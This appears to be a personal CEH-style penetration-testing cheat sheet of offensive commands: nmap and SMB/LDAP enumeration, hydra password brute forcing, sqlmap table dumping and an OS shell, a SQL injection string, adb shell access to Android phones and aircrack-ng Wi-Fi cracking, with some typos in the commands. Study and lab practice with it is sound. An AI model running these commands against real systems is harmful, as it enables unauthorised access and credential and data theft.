### Host Discovery ###
nmap -sn <IP Block>
netdiscovery -r <IP Block>

########################################################## NMAP scans #####################################################################

nmap -sn 10.10.10.10/24 -oN nmap.txt
nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt
nmap -A 10.10.10.10/24 -oN nmap.txt

nmap -sn -O 172.16.43.1/24 
nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt
nmap 172.16.43.1/24

nmap -sV -sC -pA nmap 10.10.10.x
nmap -sC -sV -v -oN nmap.txt 10.10.10.10
nmap -sU -sV -A t4 -v -oN udp.txt 10.10.10.1

nmap -f IP
nmap -sn -PR IP
nmap -sn -PE ip-range
nmap -sn 10.10.10.10/24
nmap -sC -sS -sV -O IP
nmap -A IP

-sn disable port scan
-PR ARP ping scan
-PU UDP ping scan
-PE ICMP ECHO ping scan
-f  Splits IP into fragment packets

##### Nmap with script scan #####

nmap --script smb-os-discovery.nse IP 
Displays OS, Computer-Name, Domain, WorkGroup and Ports.
nmap --script nbstat.nse ip 
##### we can see that we have the shares listed although the Access is Denied the existence of the
nmap --script smb-enum-shares -p139,445 ip 
###find version of the OS and AD #### you must enable rdp after thet you can get OS VERSION 
sudo nmap -p 3389 --script rdp-ntlm-info | grep Pro target_ip ###### useful for ad Os version 
#####Enumeration
nmap — script smb-os-discovery.nse -p445 <ip> (enumerate os, domain name,etc)
nmap — script smb-enum-users.nse -p445 <ip> (used to enumerate all users on remote Windows system using SAMR enumeration and LSA bruteforcing)
nmap -p 445 — script=smb-enum-shares.nse, smb-enum-users.nse ip (smb users and shares)

nmap -p445 --script smb-protocols 10.0.17.200


ldapsearch -x -h <IP> -b “DC=CEH,DC=com” and press enter 
ldapsearch -h [Target IP Address] -x -s base
nmap -p 389 -sV -iL <Target File> OR nmap -p 389 -sV <IP> {FQDN = Host + Domain}
nmap -A -p- 192.168.0.105 --script smb-os-discovery


nmap -A -T4 -v -p- -oN scan_results.txt 192.168.1.1 ### find all and generate report 

nmap -sV -sC -vv -oN 1000Port.txt <IP>
nmap -A -vv <IP> //aggresive scan 
sudo nmap -p- -A | servicename 
nmap -sn 170.16.0.1/24 -oN nmap.txt
nmap -O 170.16.0.1/24 -oN namp-OS.txt
namp -sC -sV -sS 170.16.0.20 -oN namp-all.txt
nmap -p 3389 <IP/24> # RDP hosts scan
nmap -p 139,445 --open -sV 10.10.55.0/24 | searching smb





### Finding Domain Controller and FQDN ####
nmap -p389,636,3268,3269 --script ldap-rootdse <IP> // LDAP Service enumaration
FQDN = Hostname+Domain // hostname.domain

##### all port scan RAT #####
Port-Specific Scan 
nmap -p 5110,6703,2968,9871,5552,1177 ip/24
nmap -sV -p 5110,6703,2968,9871,5552,1177 ip/24
Aggressive Scan
nmap -A -p 5110,6703,2968,9871,5552,1177 ip/24


—------------------------
Nmap -Pn -p 21 target > ftp
grep -B 5 open ftp

—--------------------------
Nmap -Pn -p 3389 target > rdp
grep -B 5 open rdp
—-------------------------
Nmap -Pn -p 3306 target > mysql
grep -B 5 open mysql

optional
-p : ports //-p- all ports(1-65535) | -p80,445 only 80 and 445 ports 
-Pn : Don't send icmp packet before scanning
-A : -sV -O traceroute ...
-sV : Version scan
-sC : Default script scan
-v: verbose
-O : OS Detection

### Default Ports ###
Common Services
FTP:21    SSH:22    Telnet:23    SMTP:25    HTTP:80    HTTPS:443    SMB:139/445        
RDP:3389    MYSQL:3306    MSSQL:1433    LDAP:389/636/3268/3269    NFS:2049

############################################################ RAT #####################################################################
RAT's Default Ports
ProRAT:5110    Theef:6703/2968/9871    NjRAT:5552/1177
#################################################### SMB USER GET #####################################################################
#Here we see that the target machine has some shares.
smbmap -H ip
#Let’s enumerate a user-specific share using the credentials for that user. 
smbmap -H 192.168.1.17 -u raj -p 123

smbclient //ip/guest
smbclient -L ip -U raj%123
smbclient //ip/share -U raj%123
smbclient -L \\ip
smbclient \\\\ip\\share_name -U user%password
################################################# Brute Forcing   ##################################################################

https://walk-throughs.medium.com/exploiting-drupal-via-metasploit-ctf-walkthrough-fcd5f5fa2fa

usage : hydra -l <username> -P <Wordlist Path> <Protocol>://<IP>
example : hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.12
hydra -t 4 -V -l user -P /path/to/password-list.txt rdp://<target_ip>
hydra -L user_list.txt -P password_list.txt ip smb
hydra -t 1 -V -f -l Jones -P /home/passlist.txt rdp://ip
Hydra -l anar -P given_wordlist ftp://target
hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]`
hydra -l root -P passwords.txt [-t 32] <IP> ftp
hydra -L usernames.txt -P pass.txt <IP> mysql
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V`
hydra -V -f -L <userslist> -P <passwlist> ***rdp***://<IP>`
hydra -P common-snmp-community-strings.txt target.com snmp
hydra -l Administrator -P words.txt 192.168.1.12 smb t 1
hydra -l root -P passwords.txt <IP> ssh

optional
-l : specific username (John,root,guest)
-L : username wordlist (/usr/share/wordlists/users.txt)
-p : spesific password (qwerty,password1)
-P : password wordlist (/usr/share/wordlists/rockyou.txt)


Wpscan
Wpscan –url http://ip/ --enumerate u
wpscan --url http://ip:port/uri -u root -P passwdfile.txt
wpscan -u james -P /password.txt — urlhttp://:8080/TEST

############################################################### Metasploit ##################################################################
msfconsole to open metasploit. Type -  use auxilliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE /home/anar/password.txt
set RHOSTS ip  (target ip)
set RPORT 8080          (target port)
set TARGETURI /uri
set USERNAME admin

msfconsole
search name
use exploit/unix/webapp/
set RHOSTS ip
set RPORT port
run

https://walk-throughs.medium.com/exploiting-drupal-via-metasploit-ctf-walkthrough-fcd5f5fa2fa

################################################################## Sql injection ##################################################################

Sqlmap -r req.txt   --dbs
Sqlmap -r req.txt -D dvwa
Sqlmap -r req.txt -D dvwa --table
Sqlmap -r req.txt -D dvwa --tables –columns 
Sqlmap -r req.txt -D dvwa --dump

In alternative we can use SQLMap and the vulnerable url

Get all databases using sqlmap
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Get tables from a selected database_name
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name --tables 

Get all columns from a selected table_name in the database_name
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name -T table_name --columns

Dump the data from the columns 
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name -T table_name -C column_name --dump

admin’ or 1=1 - -

`qlmap -u “[http://www.moviescope.com/viewprofile.aspx?id=1”](http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D) --cookie="xookies xxx" --dbs`

 `sqlmap -u “[http://www.moviescope.com/viewprofile.aspx?id=1”](http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D) --cookie="cookies xxx" -D moviescope --tables`

 `sqlmap -u “[http://www.moviescope.com/viewprofile.aspx?id=1”](http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D) --cookie="cookies xxx" -D moviescope -T User_Login --columns`

`qlmap -u “[http://www.moviescope.com/viewprofile.aspx?id=1”](http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D) --cookie="cookies xxx" -D moviescope -T User_Login --dump`

 `sqlmap -u “[http://www.moviescope.com/viewprofile.aspx?id=1”](http://www.moviescope.com/viewprofile.aspx?id=1%E2%80%9D) --cookie="cookies xxx" --os-shell`

############################################################## Wireshark Usefull Filters################################################################
ip.addr == 192.168.1.1: Show packets to or from the specified IP address.
ip.src == 192.168.1.1: Show packets from the specified source IP address.
ip.dst == 192.168.1.1: Show packets to the specified destination IP address.
http.request.method==POST
To find DOS (SYN and ACK) :
open file with wireshark
statistic -> IPv4 statistics -> source and destination address
filter using: `tcp.flags.syn == 1` 
or 
`tcp.flags.syn == 1 and tcp.flags.ack == 0` 
or 
filter to highest number of request
find IoT 
in search write mqtt
mqtt.msgtype == 3
mqtt
in MQ Telemetry Transport Protocol , Publish Message
find
Message: ddfgdfgdsfg;ldsf;lgk
http.response.code == 404: Show HTTP packets with a 404 status code (Not Found).
http.response.code >= 400: Show HTTP error responses (client and server errors).
tcp.stream eq 1: Show packets for a specific TCP stream (replace "1" with the appropriate stream index).
tcp.flags.syn == 1 and tcp.flags.ack == 0: Show SYN packets (indicating new TCP connections).
############################################################################################################################################ 

################################################################ Cryptografy ###############################################################
snow -C -p "password" <target_file>
openstego
snow.exe -C -p "test" confidential.txt
-C  compressing / uncompressing
-p  password
Open Stego 
GUI tool

stegsnow -p 12345 -C 1.txt 2.txt
steghide extract -sf file.doc
Hashcalc — Md5 calculator
Cryptool — decode .hex file
Bctextencoder — decrypt text using secret key
Veracrypt — anything related to volume
CryptoForge Decrypter

Veracrypt 
Cryptool
Snow
Bctextencoder
Md5 & sha1 checksum utility
Wpscan
Nmap
Metasploit
Hydra
Wireshark
Winscp
OWASP ZAP
RDP
############################################## Mobile Hacking ---- android-using-phonesploit ########################################################################################################################## 
adb connect <IP>:<PORT>(default port 5555)
adb shell
pwd, ls ... basic linux commands
exit
adb pull <target_file> .
#
cd PhoneSploit
python3 -m pip install colorama
python3 phonesploit.py
Type 3 and press Enter to select [3] Connect a new phone option.

When prompted to Enter a phones ip address, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.

If you are getting Connection timed out error, then type 3 again and press Enter. If you do not get any option, then type 3 and press Enter again, until you get Enter a phones ip address option.
You will see that the target Android device (in this case, 10.10.10.14) is connected through port number 5555.

If you are unable to establish a connection with the target device, then press Ctrl+C and re-perform steps#8–11.
Now, at the main_menu prompt, type 4 and press Enter to choose Access Shell on a phone.

When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.

#################################################################################################################################################################################

####################################################### WIFI Hacking ########################################################################################################
Crack the wireless encryption and identify the Wi-Fi password
1st tentative:** `aircrack-ng pcapfile` (usually works only for WEP encryption)
2nd tentative**: `aircrack-ng -w passwordlist pcapfile`
3rd tentative**: adding BSSID (-b flag): `aircrack-ng -b BSSID -w passwordlist pcapfile` 
(To find BSSID: on Wireshark click on packet, search BSSID and copy value)

aircrack-ng '/data/1.cap bu komanda ile 20:E5:2A:E4:38:00  tapirsan
aircrack-ng -a2 -b SSID  -w /usr/share/wordlists/password.txt '/home/anar/data/anar/1.cap'
####
SMS hacking 
https://walk-throughs.medium.com/exploiting-drupal-via-metasploit-ctf-walkthrough-fcd5f5fa2fa

################################################################################################################################################################################
######
https://www.cvedetails.com/
https://crackstation.net/
https://hashes.com/en/decrypt/hash

 

